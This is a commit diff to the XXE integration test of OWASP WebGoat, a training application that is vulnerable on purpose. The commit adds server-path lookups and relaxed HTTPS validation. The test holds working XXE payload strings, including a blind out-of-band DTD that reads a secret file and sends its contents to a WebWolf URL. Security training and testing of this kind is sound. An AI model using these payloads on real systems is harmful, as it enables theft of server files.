xxe path info (#670)

* xxe path info aid added * xxe path info aid added * changes to template file and hints * added ssl test support for XXE * added ssl test support for XXE * restconfig replaced by httpsrelaxed * processed review comments on hints and example
2019-10-02 09:59:32 +02:00
parent 7536770769
commit 663224d06a
13 changed files with 152 additions and 52 deletions
--- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/XXETest.java
+++ b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/XXETest.java
@ -17,14 +17,17 @@ public class XXETest extends IntegrationTest {
    private static final String dtd7 = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><!ENTITY % file SYSTEM \"file:SECRET\"><!ENTITY % all \"<!ENTITY send SYSTEM 'WEBWOLFURL?text=%file;'>\">%all;";
    private static final String xxe7 = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE comment [<!ENTITY % remote SYSTEM \"WEBWOLFURL/USERNAME/blind.dtd\">%remote;]><comment><text>test&send;</text></comment>";
    
-    private String webGoatHomeDirectory = System.getProperty("user.dir").concat("/target/.webgoat");
-    private String webwolfFileDir = System.getProperty("user.dir").concat("/target/webwolf-fileserver");
+    private String webGoatHomeDirectory;
+    private String webwolfFileDir;
    
    
    @Test
    public void runTests() throws IOException {
        startLesson("XXE");
        
+        webGoatHomeDirectory = getWebGoatServerPath();
+        webwolfFileDir = getWebWolfServerPath();
+        
        checkAssignment(url("/WebGoat/xxe/simple"),ContentType.XML,xxe3,true);
        
        checkAssignment(url("/WebGoat/xxe/content-type"),ContentType.XML,xxe4,true);
@ -55,7 +58,7 @@ public class XXETest extends IntegrationTest {
        //upload DTD
        RestAssured.given()
        .when()
-        .config(restConfig)
+        .relaxedHTTPSValidation()
        .cookie("WEBWOLFSESSION", getWebWolfCookie())
        .multiPart("file", "blind.dtd", dtd7String.getBytes())
        .post(webWolfUrl("/WebWolf/fileupload"))
@ -69,7 +72,7 @@ public class XXETest extends IntegrationTest {
        //read results from WebWolf
        String result = RestAssured.given()
        .when()
-        .config(restConfig)
+        .relaxedHTTPSValidation()
        .cookie("WEBWOLFSESSION", getWebWolfCookie())
        .get(webWolfUrl("/WebWolf/requests"))
        .then()
@ -79,4 +82,32 @@ public class XXETest extends IntegrationTest {
        return result;
    }
    
+    private String getWebGoatServerPath() throws IOException {
+    	
+    	//read path from server
+        String result = RestAssured.given()
+        .when()
+        .relaxedHTTPSValidation()
+        .cookie("JSESSIONID", getWebGoatCookie())
+        .get(url("/WebGoat/xxe/tmpdir"))
+        .then()
+        .extract().response().getBody().asString();
+        result = result.replace("%20", " ");
+        return result;
+    }
+    
+    private String getWebWolfServerPath() throws IOException {
+    	
+    	//read path from server
+        String result = RestAssured.given()
+        .when()
+        .relaxedHTTPSValidation()
+        .cookie("WEBWOLFSESSION", getWebWolfCookie())
+        .get(webWolfUrl("/tmpdir"))
+        .then()
+        .extract().response().getBody().asString();
+        result = result.replace("%20", " ");
+        return result;
+    }
+        
 }